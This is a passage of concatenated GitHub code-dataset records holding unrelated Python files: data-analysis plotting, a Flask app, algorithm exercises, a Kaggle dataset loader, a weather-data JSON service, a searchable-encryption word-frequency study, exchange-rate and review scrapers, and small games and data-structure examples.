column_name:\n p_ = 1.\n r_ = 1\n else:\n print(column_name)\n column_data = column_data.astype(np.float)\n print(column_name1)\n 
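# after the cast, the block below drops every index that is NaN in either\n                # column so that pearsonr receives two aligned, complete samples\n                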
column_data1 = column_data1.astype(np.float)\n # data = grubbs.test(column_data.values, alpha=0.05)\n # data1 = grubbs.test(column_data1.values, alpha=0.05)\n data = column_data.values\n data1 = column_data1.values\n col1_nan = set(np.argwhere(np.isnan(data)).flat)\n col2_nan = set(np.argwhere(np.isnan(data1)).flat)\n indices_nan = list(col1_nan) + list(col2_nan - col1_nan)\n col1 = np.delete(data, indices_nan)\n col2 = np.delete(data1, indices_nan)\n print(column_name, column_name1)\n print(sc.shapiro(col1))\n print(sc.shapiro(col2))\n print(col1)\n print(col2)\n r_, p_ = sc.pearsonr(col1, col2)\n print(sc.pearsonr(col1, col2))\n duo.append(column_name1 + \"/\" + column_name)\n if p_ > 0.05:\n p_ = 0.3\n else:\n p_ = 1.\n pvalue_matrix[column_name][column_name1] = p_\n coeff_matrix[column_name][column_name1] = r_\n return pvalue_matrix, coeff_matrix\n\n\ndef correlation_nodes_graph():\n pass\n\n\nif __name__ == '__main__':\n # parameters_data = pd.read_csv(\"ArjunDataGlobal4.csv\")\n # data_wt = parameters_data[parameters_data[\"GENOTYPE\"] == \"WT\"]\n # data_wt = data_wt.replace('', np.nan)\n # to_exclude_wt = [\"GENOTYPE\", \"RMSD\", \"Unnamed: 0\", \"CELL NUMBER\", \"CELL ID\", \"CELL ID spontaneous\", \"5th AP\",\n # 'AP halfwidth ratio (5/1)', \"AP halfwidth ratio (3/1)\", \"Alpha1\", \"Alpha2\", \"EPSP SD response\",\n # \"Peak latency from Onset\", 'Old SNR', \"EPSP response var\", \"1st AP\", \"ADP amplitude\", \"MAE\",\n # \"spont.firing\"]\n # pvalue_wt, coeff_wt = correlation_matrix(data_wt, to_exclude_wt)\n # corr = pd.melt(pvalue_wt.reset_index(), id_vars='index') # Unpivot the dataframe, to get pair of arrays for x and y\n # coeff = pd.melt(coeff_wt.reset_index(), id_vars='index')\n # corr.columns = ['x', 'y', 'value']\n # heatmap(\n # x=corr['x'],\n # y=corr['y'],\n # size=corr['value'].abs(),\n # color=coeff['value'],\n # filename=\"WTcorrelationPlotReduced.pdf\"\n # )\n parameters_data = pd.read_excel(\"2022.04.19 - Combined Data Individual Cells.xlsx\",sheet_name=\"FmKO Individual Cells\")\n data_kobms = parameters_data[parameters_data[\"GENOTYPE\"] ==\"WT-BMS\"]\n data_kobms = data_kobms.replace('', np.nan)\n to_exclude_kobms = [\"GENOTYPE\", \"Unnamed: 0\", \"CELL NUMBER\", \"CELL ID\", \"CELL ID spontaneous\"\n , \"AP halfwidth ratio (3/1)\", \"Alpha1\", \"Alpha2\",\n \"Peak latency from Onset\", \"1st AP\"]\n pvalue_kobms, coeff_kobms = correlation_matrix(data_kobms, to_exclude_kobms)\n corr = pd.melt(pvalue_kobms.reset_index(), id_vars='index') # Unpivot the dataframe, to get pair of arrays for x and y\n coeff = pd.melt(coeff_kobms.reset_index(), id_vars='index')\n corr.columns = ['x', 'y', 'value']\n heatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['value'].abs(),\n color=coeff['value'],\n filename=\"WTBMS_corrmatrix.pdf\"\n )\n","repo_name":"ToGauvrit/ElectroPhyAnalysis","sub_path":"Plotting/Correlation_plots.py","file_name":"Correlation_plots.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10519650529","text":"from flask import Flask, render_template, jsonify\nimport periodic\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index_page():\n\n return render_template('index.html')\n\n\n@app.route(\"/periodic/\")\ndef get_word(word):\n\n periodics = periodic.get_periodics(word)\n if len(periodics) > 0:\n return jsonify({'periodics': periodics})\n else:\n return jsonify({\n 'no_periodics': {\n 'suggestions': 
periodic.find_twenty_similar_words(word)\n            }\n        })\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"ktbartolotta/periodically","sub_path":"periodic_app.py","file_name":"periodic_app.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"18309495034","text":"from typing import List\nfrom collections import defaultdict\nfrom itertools import combinations\n\n\nclass Solution:\n    def minimumScore(self, nums: List[int], edges: List[List[int]]) -> int:\n        n = len(nums)\n        dic = defaultdict(list)\n        for x, y in edges:\n            dic[x].append(y)\n            dic[y].append(x)\n\n        cnt = [0 for _ in range(n)]\n        in1 = [0 for _ in range(n)]\n        out = [0 for _ in range(n)]\n        clock = 0\n\n        # DFS records each node's Euler-tour interval [in1, out] and its subtree XOR (cnt)\n        def cal(node, fa):\n            nonlocal cnt, in1, out, clock\n            clock += 1\n            in1[node] = clock\n\n            res = nums[node]\n            for val in dic[node]:\n                if val == fa:\n                    continue\n                res ^= cal(val, node)\n\n            cnt[node] = res\n            out[node] = clock\n            return res\n\n        cal(0, -1)\n\n        # orient each edge so edges[i][0] is the deeper endpoint, i.e. the root\n        # of the subtree that is cut off when the edge is removed\n        for i in range(len(edges)):\n            if in1[edges[i][0]] < in1[edges[i][1]]:\n                edges[i][0], edges[i][1] = edges[i][1], edges[i][0]\n\n        res = float('inf')\n        # the Euler-tour intervals tell whether one removed edge lies inside the\n        # other's subtree; XOR the three resulting components accordingly\n        for (x, y), (x1, y1) in combinations(edges, 2):\n            if in1[y] >= in1[x1] and out[x1] >= in1[y]:\n                a, b, c = cnt[0] ^ cnt[x1], cnt[x], cnt[x1] ^ cnt[x]\n            elif in1[y1] >= in1[x] and out[x] >= in1[y1]:\n                a, b, c = cnt[0] ^ cnt[x], cnt[x1], cnt[x] ^ cnt[x1]\n            else:\n                a, b, c = cnt[x], cnt[x1], cnt[0] ^ cnt[x] ^ cnt[x1]\n            res = min(res, max(a, b, c) - min(a, b, c))\n        return res","repo_name":"jiangruofan/algorithm","sub_path":"2322. Minimum Score After Removals on a Tree.py","file_name":"2322. Minimum Score After Removals on a Tree.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"41402814086","text":"import os\nimport random\nimport cv2\nimport joblib\nimport numpy as np\nfrom torch.utils.data import Dataset\nimport albumentations as album\n\n\ndef get_transforms(cfg):\n    def get_object(transform):\n        if hasattr(album, transform.name):\n            return getattr(album, transform.name)\n        else:\n            return eval(transform.name)\n    if cfg.transforms:\n        transforms = [get_object(transform)(**transform.params) for name, transform in cfg.transforms.items()]\n        return album.Compose(transforms)\n    else:\n        return None\n\n\ndef concat_tiles(image_list):\n    image = []\n    row_num = int(np.sqrt(len(image_list)))\n\n    for i in range(row_num):\n        v = [image_list[(row_num * i) + j] for j in range(row_num)]\n        image.append(cv2.hconcat(v))\n\n    return cv2.vconcat(image)\n\n\nclass CustomDataset(Dataset):\n    def __init__(self, df, labels, cfg):\n        self.cfg = cfg\n        self.image_ids = df['image_id'].values\n        self.labels = labels\n        self.transforms = get_transforms(self.cfg)\n        self.is_train = cfg.is_train\n        self.image_path = f'../data/input/train_tile_{cfg.tile.size}x{cfg.tile.num}'\n        self.tile_imp_dict = joblib.load('../pickle/tile_imp.pkl')\n\n    def __len__(self):\n        return len(self.image_ids)\n\n    def __getitem__(self, idx):\n        image_id = self.image_ids[idx]\n        tiles = []\n        for i in range(self.cfg.tile.num):\n            tile = cv2.imread(f'{self.image_path}/{image_id}_{i}.png')\n            if self.transforms:\n                tile = self.transforms(image=tile)['image']\n            tiles.append(tile)\n        # if self.transforms:\n        #     random.shuffle(tiles)\n        image = concat_tiles(tiles)\n        image = 255 - (image * (255.0/image.max())).astype(np.uint8)\n        # image = cv2.resize(image, dsize=(self.cfg.img_size.height, self.cfg.img_size.width))\n        if self.transforms:\n            image = self.transforms(image=image)['image']\n        image = image.transpose(2, 0, 
1).astype(np.float32)\n\n if self.is_train:\n label = self.labels.values[idx]\n return image, label\n else:\n return image\n","repo_name":"Naoki1101/kaggle-panda","sub_path":"src/dataset/custom_dataset.py","file_name":"custom_dataset.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30790274506","text":"#!/usr/bin/env python\n\"\"\" JSON service providing hourly Stage IV data for a given point \"\"\"\n\nimport datetime\nimport json\nimport sys\nimport cgi\n\nimport netCDF4\nimport numpy as np\nimport memcache\nfrom pyiem import iemre, datatypes\nfrom pyiem.util import utc\n\n\ndef myrounder(val, precision):\n \"\"\"round a float or give back None\"\"\"\n if val is None or np.isnan(val) or np.ma.is_masked(val):\n return None\n return round(val, precision)\n\n\ndef dowork(form):\n \"\"\"Do work!\"\"\"\n date = datetime.datetime.strptime(form.getfirst('valid'), '%Y-%m-%d')\n lat = float(form.getfirst(\"lat\"))\n lon = float(form.getfirst(\"lon\"))\n\n # We want data for the UTC date and timestamps are in the rears, so from\n # 1z through 1z\n sts = utc(date.year, date.month, date.day, 1)\n ets = sts + datetime.timedelta(hours=24)\n sidx = iemre.hourly_offset(sts)\n eidx = iemre.hourly_offset(ets)\n\n ncfn = \"/mesonet/data/stage4/%s_stage4_hourly.nc\" % (date.year, )\n nc = netCDF4.Dataset(ncfn, 'r')\n\n dist = ((nc.variables['lon'][:] - lon)**2 +\n (nc.variables['lat'][:] - lat)**2)**0.5\n (j, i) = np.unravel_index(dist.argmin(), dist.shape)\n res = {'gridi': i, 'gridj': j, 'data': []}\n\n ppt = nc.variables['p01m'][sidx:eidx, j, i]\n nc.close()\n\n for tx, pt in enumerate(ppt):\n valid = sts + datetime.timedelta(hours=tx)\n res['data'].append({\n 'end_valid': valid.strftime(\"%Y-%m-%dT%H:00:00Z\"),\n 'precip_in': myrounder(\n datatypes.distance(pt, 'MM').value('IN'), 2)\n })\n\n return json.dumps(res)\n\n\ndef main():\n \"\"\"Do Something Fun!\"\"\"\n sys.stdout.write(\"Content-type: application/json\\n\\n\")\n\n form = cgi.FieldStorage()\n lat = float(form.getfirst('lat'))\n lon = float(form.getfirst('lon'))\n valid = form.getfirst('valid')\n cb = form.getfirst('callback', None)\n\n mckey = \"/json/stage4/%.2f/%.2f/%s?callback=%s\" % (lon, lat, valid, cb)\n mc = memcache.Client(['iem-memcached:11211'], debug=0)\n res = mc.get(mckey)\n if not res:\n res = dowork(form)\n mc.set(mckey, res, 3600*12)\n\n if cb is None:\n sys.stdout.write(res)\n else:\n sys.stdout.write(\"%s(%s)\" % (cb, res))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ELjungdahl/iem","sub_path":"htdocs/json/stage4.py","file_name":"stage4.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"7952615671","text":"# 507/206 Homework 7 Part 2\nimport json\n\ncount = 0\n#### Your Part 2 solution goes here ####\njson_file = open(\"directory_dict.json\", \"r\")\njson_content = json_file.read()\nloaded_directory_dict = json.loads(json_content) #loading it into a dictionary from a json string\n\n\nfor key in loaded_directory_dict.keys():\n if loaded_directory_dict[key][\"title\"] == \"PhD student\":\n count +=1\n\n\n#### Your answer output (change the value in the variable, count)####\nprint('The number of PhD students: ', 
count)\n","repo_name":"Iviev/Web-crawling-scraping","sub_path":"hw7_part2.py","file_name":"hw7_part2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"137186649","text":"# Create your classes here\nclass Student:\n    \"\"\"Create objects of class Student, containing student names and addresses\"\"\"\n\n    def __init__(self, first_name, last_name, address):\n        self.first_name = first_name\n        self.last_name = last_name\n        self.address = address\n\n\nclass Question:\n    \"\"\"Create Question objects containing a question and its correct answer\"\"\"\n\n    def __init__(self, question, correct_answer):\n        self.question = question\n        self.correct_answer = correct_answer\n\n    def ask_and_answer(self):\n        response = input(self.question)\n        if response == self.correct_answer:\n            return True\n        else:\n            return False\n\n\nclass Exam:\n    \"\"\"Create Exam objects, containing a name and a list of Question objects\"\"\"\n\n    def __init__(self, name):\n        self.name = name\n        # instance attribute, so separate exams do not share one question list\n        self.questions = []\n\n    def add_question(self, Question_obj):\n        \"\"\"Method to add individual question to the exam.\"\"\"\n        self.questions.append(Question_obj)\n    \n    def administer(self):\n        tally = 0\n        for question in self.questions:\n            if question.ask_and_answer():\n                tally += 1\n        \n        score = 100 * (tally / len(self.questions))\n        return score\n\n\nclass Quiz(Exam):\n    \"\"\"subclass of exam, where score is modified for pass/fail\"\"\" \n    def administer(self):\n        score = super().administer()\n        if score >= 60.0:\n            return 1\n        else:\n            return 0\n\n\nclass StudentExam:\n    \"\"\"object is a student exam, exam + method for administration\"\"\"\n    score = 0\n\n    def __init__(self, student, exam):\n        self.student = student\n        self.exam = exam\n    \n    def take_test(self):\n        \"\"\"uses the administer method to run and score the exam\"\"\"\n        self.score = self.exam.administer()\n\n\nclass StudentQuiz:\n    \"\"\"object is a student quiz, quiz subclass of exam + method for administration\"\"\"\n    score = 0\n\n    def __init__(self, student, quiz):\n        self.student = student\n        self.quiz = quiz\n    \n    def take_test(self):\n        \"\"\"uses the administer method to run and score the exam\"\"\"\n        self.score = self.quiz.administer()\n\n\ndef example():\n    \"\"\"creates a working student exam\"\"\"\n    first_exam = Quiz('First Exam')\n    alberta_capital = Question('What is the capital of Alberta?', 'Edmonton')\n    first_exam.add_question(alberta_capital)\n    python_author = Question('Who is the author of Python?', 'Guido Van Rossum')\n    first_exam.add_question(python_author)\n    set_q = Question('What is the method for adding an element to a set?', '.add()')\n    first_exam.add_question(set_q)\n    pwd_q = Question('What does pwd stand for?', 'print working directory')\n    first_exam.add_question(pwd_q)\n    list_q = Question('Python lists are mutable, iterable, and what?', 'ordered')\n    first_exam.add_question(list_q)\n\n    june = Student('June', 'Adam', '2023 Still here again')\n\n    student_exam_1 = StudentQuiz(june, first_exam)\n\n    student_exam_1.take_test()\n\n    print(student_exam_1.score)\n\nexample()\n\n\n\n\n","repo_name":"juneadam/study-guide-week-2","sub_path":"oo.py","file_name":"oo.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"29681991961","text":"import glob, re, math, Crypto.Random, binascii, os\nfrom decimal import *\nfrom encryption_1 import *\nfrom collections import Counter\nfrom scipy.stats import 
binom\n\ndirectory = '/home/minh/Downloads/Corpus/#ubuntu+1/*'\npath_name_testing = '/home/minh/Desktop/ssee/10_day/next_testing_probability_training'\npath_name_training = '/home/minh/Desktop/ssee/10_day/training'\npath_name_AAA = '/home/minh/Desktop/ssee/60_day/AAA'\n\ndef get_list_file_name(link_file, list_file_comparing=[]):\n\tlist_file_ = []\n\tfor file_name in link_file:\n\t\tif file_name in list_file_comparing:\n\t\t\tcontinue\n\t\telif len(list_file_) < 10:\n\t\t\tlist_file_.append(file_name)\n\t\telse:\n\t\t\treturn list_file_\n\ndef creating_dir(path_name):\n\tif 'AAA' in path_name:\n\t\tif not os.path.exists(path_name):\n\t\t\tos.makedirs(path_name)\n\t\treturn os.path.abspath(path_name)\n\telse:\n\t\tlist_directory = []\n\t\tfor i in xrange(1,4):\n\t\t\tcurr_path_name = os.path.join(path_name, str(i))\n\t\t\tif not os.path.exists(curr_path_name):\n\t\t\t\tos.makedirs(curr_path_name)\n\t\t\tlist_directory.append(os.path.abspath(curr_path_name))\n\t\treturn list_directory\n\n\ndef prepare_writing_file(list_file_training, list_file_testing\n\t, directory_training, directory_testing):\n\n\tlist_word_percentage_training, list_word_count_training, total_words_training = writing_file(\n\t\tlist_file_training, directory_training)\n\n\tlist_word_percentage_testing, list_word_count_testing, total_words_testing = writing_file(\n\t\tlist_file_testing, directory_testing)\n\n\treturn list_word_count_training, list_word_percentage_training, list_word_count_testing, list_word_percentage_testing, total_words_training, total_words_testing\n\ndef writing_file(list_file_, directory):\n\tlist_word_percentage = []\n\tlist_word_count = []\n\n\tfor i in xrange(1,4):\n\t\tword_count = {}\n\t\ttotal_words = 0\n\t\tcase_directory = directory[i-1]\n\t\tfile_name = str(i) + '.txt'\n\t\twith open(os.path.join(case_directory, file_name), 'wb') as f:\n\t\t\tfor file_name in list_file_:\n\t\t\t\tcounting, word_count = count_and_create_list(file_name, word_count, i)\n\t\t\t\ttotal_words += counting\n\n\t\t\tword_percentage = percentage_plain_text(word_count, total_words)\n\t\t\tlist_word_percentage.append(word_percentage)\n\t\t\tlist_word_count.append(word_count)\n\n\t\t\tsort = sorted( ((v,k) for k,v in word_percentage.iteritems()), reverse=True)\n\t\t\tfor key, value in sort:\n\t\t\t\tf.write(str(key))\n\t\t\t\tf.write(':')\n\t\t\t\tf.write(str(value))\n\t\t\t\tf.write('\\n')\n\t\t\tf.close()\n\treturn list_word_percentage, list_word_count, total_words\n\ndef count_and_create_list(file_name, word_count, testing_case):\n\tcount = 0\n\twith open(file_name) as f:\n\t\tfor sentences in f.readlines():\n\t\t\tif len(sentences.split()) - 2 != testing_case:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcount += 1\n\t\t\t\tcur_words = ''\n\t\t\t\twords = ' '.join(sentences.lower().split()[2:])\n\t\t\t\tif len(words.split()) == 1:\n\t\t\t\t\tcur_words = regex_words(words)\n\t\t\t\telse:\n\t\t\t\t\tfor word in words.split():\n\t\t\t\t\t\tcur_words += regex_words(word) + ' '\n\t\t\t\tif len(words.split()) != len(cur_words.split()) or cur_words == '':\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\twords = cur_words\n\t\t\t\tif words not in word_count:\n\t\t\t\t\tword_count[words] = 1\n\t\t\t\telse:\n\t\t\t\t\tword_count[words] += 1\n\t\tf.close()\n\treturn count, word_count\n\ndef regex_words(word):\n\tregex = re.compile('[^a-z]')\n\ttesting_word = regex.sub('', word)\n\tif testing_word != '':\n\t\treturn testing_word\n\treturn ''\n\ndef percentage_plain_text(word_count, total_words):\n\tword_percent = {}\n\tfor word, 
appearance in word_count.items():\n\t\tprobability_success = float(appearance)/float(total_words)\n\t\tword_percent.update({word:probability_success})\n\treturn word_percent\n\ndef create_tag(list_wordcount_training, name, directory_AAA):\n\tE = Encryption('chilun1403', 'chilun2411')\n\tsalt = binascii.hexlify(Crypto.Random.get_random_bytes(16))\n\tlist_number_word_tag = []\n\n\tfor i in range(len(list_wordcount_training)):\n\t\tlist_word_tag = {}\n\t\ttag_word = {}\n\t\tfor word, value in list_wordcount_training[i].items():\n\t\t\tIV = E._create_IV('text', salt)\n\t\t\tword_tag = E.PRF(word)\n\t\t\tlist_word_tag.update({word_tag:value})\n\t\t\ttag_word.update({word:word_tag})\n\t\tlist_number_word_tag.append(list_word_tag)\n\n\t\tfile_name = str(i+1) + name + '.txt'\n\n\t\twith open(os.path.join(directory_AAA, file_name), 'wb') as f:\n\t\t\tfor key, value in tag_word.items():\n\t\t\t\tf.write(str(key))\n\t\t\t\tf.write(':')\n\t\t\t\tf.write(str(value))\n\t\t\t\tf.write('\\n')\n\t\t\tf.close()\n\treturn list_number_word_tag\n\ndef probability_tag(dict_tag, guess_word, guess_word_percent_success, total_words\n\t, directory, name):\n\tfile_name = guess_word + name + '.txt'\n\twith open(os.path.join(directory, file_name), 'wb') as f:\n\t\tprint_tag = {}\n\t\tfor word, appearance in dict_tag.items():\n\t\t\tword_probability = binom.pmf(appearance, total_words, guess_word_percent_success)\n\t\t\tprint_tag.update({word:word_probability})\n\n\t\tsort = sorted( ((v,k) for k,v in print_tag.iteritems()), reverse=True)\n\n\t\tfor key, value in sort:\n\t\t\tf.write(str(key))\n\t\t\tf.write(':')\n\t\t\tf.write(str(value))\n\t\t\tf.write('\\n')\n\t\tf.close\n\n\nif __name__ == '__main__':\n\n\tlist_file_training = get_list_file_name(sorted(glob.glob(directory)), [])\n\tlist_file_testing = get_list_file_name(sorted(glob.glob(directory)), list_file_training)\n\n\tdirectory_training = creating_dir(path_name_training)\n\tdirectory_testing = creating_dir(path_name_testing)\n\tdirectory_AAA = creating_dir(path_name_AAA)\n\n\tlist_word_count_training, list_word_percentage_training, list_word_count_testing, list_word_percentage_testing, total_words_training, total_words_testing = prepare_writing_file(\n\t\tlist_file_training, list_file_testing, directory_training, directory_testing)\n\n\t#list_number_word_tag_training = create_tag(list_word_count_training, 'training', directory_AAA)\n\n\tlist_number_word_tag_testing = create_tag(list_word_count_testing, 'next_testing_probability_training', directory_AAA)\n\n\t'''for i in range(len(list_word_percentage_training)):\n\t\tfor word, value in list_word_percentage_training[i].items():\n\t\t\tprobability_tag(list_number_word_tag_training[i], word, value, total_words_training\n\t\t\t\t, directory_training[i], 'training')'''\n\n\t'''for i in range(len(list_word_percentage_testing)):\n\t\tfor word, value in list_word_percentage_testing[i].items():\n\t\t\tprobability_tag(list_number_word_tag_testing[i], word, value, total_words_testing\n\t\t\t\t, directory_testing[i], 'testing')'''\n\n\tfor i in xrange(len(list_word_percentage_testing)):\n\t\tfor word, value in list_word_percentage_testing[i].items():\n\t\t\tif word in list_word_percentage_training[i]:\n\t\t\t\tprobability_tag(list_number_word_tag_testing[i], word, list_word_percentage_training[i][word],\n\t\t\t\t\ttotal_words_testing, directory_testing[i], 'testing')\n\t\t\telse:\n\t\t\t\tprobability_tag(list_number_word_tag_testing[i], word, 0, total_words_testing,\n\t\t\t\t\tdirectory_testing[i], 
'testing')","repo_name":"vunhatminh241191/Simple-Searchable-Encrypted-Enail","sub_path":"testing_update.py","file_name":"testing_update.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3260322236","text":"# Utilities\nimport pandas as pd\n\n# Models\nfrom models.tasas_cambio import Tasas_Cambio\n\n# Custom Functions\nfrom utils.tasas_bcv import get_book, get_data_sheets\n\n# Conexion a base de datos\nimport db\n\n# fecha maxima a partir de la cual buscar los datos\nquery_fecha_max = \"\"\"SELECT\tMAX(fecha)\nFROM public.tasas_cambio\nWHERE fuente = 'BCV' \"\"\"\n\nfecha_max = pd.read_sql(query_fecha_max, db.engine)\nfecha_max = pd.to_datetime(fecha_max['max'][0]).date()\n\n# Paginas para colsultar\nHOME_URL = 'http://www.bcv.org.ve/estadisticas/otras-monedas'\n\ndata = pd.DataFrame()\nfor i in range(1,11):\n XPATH_TO_FILE = '//*[@id=\"block-system-main\"]/div/div[1]/div/div[1]/table/tbody/tr[{}]/td[2]/span/a'.format(i)\n book = get_book(HOME_URL,XPATH_TO_FILE)\n sheets = book.sheet_names\n\n for sheet in sheets:\n sheet = book.parse(sheet)\n for row in get_data_sheets(sheet).itertuples():\n if row.Fecha_Valor.date() > fecha_max:\n tasa = Tasas_Cambio(\n row.Fecha_Valor,\n row.Moneda,\n 'BCV',\n row.Tasa,\n row.Pais\n )\n tasa.insert_data()\n else:\n break;\n \n book.close()","repo_name":"bgonzalez6/scraping_tasas_bcv","sub_path":"get_tasas_bcv.py","file_name":"get_tasas_bcv.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71713296244","text":"from math import floor\r\nimport string\r\nfrom unittest import result\r\nball=1\r\n\r\n\r\ndef stage():\r\n for i in range(0,size):\r\n for j in range(0,size):\r\n if(i==0 or j==0 or j==size-1):\r\n li[i][j]=\"W\"\r\n elif(i==size-1 and not(j==size-1) and not(j==floor(size/2))):\r\n li[i][j]=\"G\"\r\n elif(i==size-1 and j==floor(size/2)):\r\n li[i][j]=\"o\"\r\n\r\ndef display():\r\n for i in li:\r\n for j in i:\r\n print(j,end=\" \")\r\n print()\r\n print(\"Ball count is \",ball,\".\",sep=\"\")\r\n\r\ndef brick():\r\n binput=list(map(int,input(\"Enter the brick's position and brick type\\n (1,2,3,4 for DE,5 for DS):\")))\r\n li[binput[0]][binput[1]]=binput[2]\r\n cont=input(\"Do you want to continue(Y or N)?\")\r\n if cont=='Y':\r\n brick()\r\n elif cont=='N':\r\n global ball\r\n ball=int(input(\"Enter ball count:\"))\r\n\r\n\r\ndef direction():\r\n d=input(\"Enter the direction in which the ball needs to traverse:\")\r\n if d==\"ST\":\r\n for i in range(size-2,-1,-1):\r\n j=floor(size/2)\r\n if destroy(i,j)==1:\r\n return\r\n if i==0:\r\n global ball\r\n ball-=1\r\n\r\n elif d==\"LD\":\r\n i=size-1\r\n j=floor(size/2)\r\n count=0\r\n while count<2:\r\n i-=1\r\n j-=1\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n while count<2:\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n break\r\n else:\r\n j-=1\r\n if count==2:\r\n ball-=1\r\n \r\n elif d==\"RD\":\r\n i=size-1\r\n j=floor(size/2)\r\n count=0\r\n while count<2:\r\n i+=1\r\n j+=1\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n while count<2:\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n break\r\n else:\r\n j+=1\r\n if count==2:\r\n ball-=1\r\n \r\ndef destroy(i,j):\r\n if li[i][j]==5:\r\n li[i][j]=\" \"\r\n li[i][j-1]=\" \"\r\n li[i][j+1]=\" \"\r\n li[i-1][j]=\" \"\r\n 
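# (a type-5 DS brick wipes the whole 3x3 block centred on (i, j))\r\n        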
li[i-1][j-1]=\" \"\r\n li[i-1][j+1]=\" \"\r\n li[i+1][j]=\" \"\r\n li[i+1][j-1]=\" \"\r\n li[i+1][j+1]=\" \"\r\n return 1\r\n elif li[i][j]==4:\r\n li[i][j]=\" \"\r\n li[i][j-1]=\" \"\r\n li[i][j+1]=\" \"\r\n return 1\r\n elif li[i][j]==3:\r\n li[i][j]=2\r\n return 1\r\n elif li[i][j]==2:\r\n li[i][j]=1\r\n return 1\r\n elif li[i][j]==1:\r\n li[i][j]=\" \"\r\n return 1\r\n\r\ndef result():\r\n count=0\r\n for i in li:\r\n for j in i:\r\n if j not in('W','G','o',' '):\r\n count+=1\r\n if count>0:\r\n return True\r\n print(\"You won\")\r\n return False\r\n\r\nif __name__==\"__main__\":\r\n size=int(input(\"Enter size of NXN matrix:\"))\r\n li=[[\" \" for __ in range(size)] for _ in range(size)] \r\n stage()\r\n brick()\r\n display()\r\n while result():\r\n direction()\r\n display()\r\n if ball==0:\r\n print(\"Game over\")\r\n break","repo_name":"Mehul541/Brick-Ball","sub_path":"brick_ball.py","file_name":"brick_ball.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21986757315","text":"\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def push(self, new_data):\r\n new_node = Node(new_data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n\r\n def get_count_rec(self, node):\r\n if (not node):\r\n return 0\r\n else:\r\n return 1 + self.get_count_rec(node.next)\r\n\r\n def get_count(self):\r\n return self.get_count_rec(self.head)\r\n\r\n\r\nif __name__ == '__main__':\r\n llist = linked_list()\r\n llist.push(1)\r\n llist.push(3)\r\n llist.push(1)\r\n llist.push(2)\r\n llist.push(1)\r\n print('Count of nodes is :', llist.get_count())\r\n","repo_name":"dannygirl0211/SOFTWARE-DESIGN-LAB-EXERCISES","sub_path":"SOFTWARE_DESIGN_2-A_ESPORSADO,DANNYLYN_LAB_REPORT#3/7.3.py","file_name":"7.3.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12213817846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup, Comment\nimport requests\nimport re\nimport data_access as da\nimport datetime\nimport time\n\noutput_file = \"tripadvisor_output.csv\"\nreview_counter=0;\nurl =\"https://www.tripadvisor.com.sg/Hotel_Review-g294265-d1770798-Reviews-or{data_offset}-Marina_Bay_Sands-Singapore.html\"\n#f = open(output_file, \"w\")\n\n\n\"\"\"-------------------------------------------------------\nHelper Function 1:\nRemove non-ascii characters from text string\n----------------------------------------------------------\"\"\"\ndef remove_nonascii(text):\n\tif text is not None:\n\t\treturn text.encode(\"ascii\", \"ignore\").decode(\"ascii\").strip()\n\t\t#return text.encode(\"utf-8\")\n\telse:\n\t\treturn text\n\n\t\n\"\"\"-------------------------------------------------------------------\nHelper Function 2:\nExtract country from location. Note: Country is after the last commas\n-----------------------------------------------------------------------\"\"\"\ndef extract_country(location):\n\tif location is None:\n\t\treturn\n\t\n\tcountry = location.split(\",\")[-1].strip()\n\treturn country\n\n\n\"\"\"---------------------------------------------------------------\nHelper function 3:\nDate comparison. 
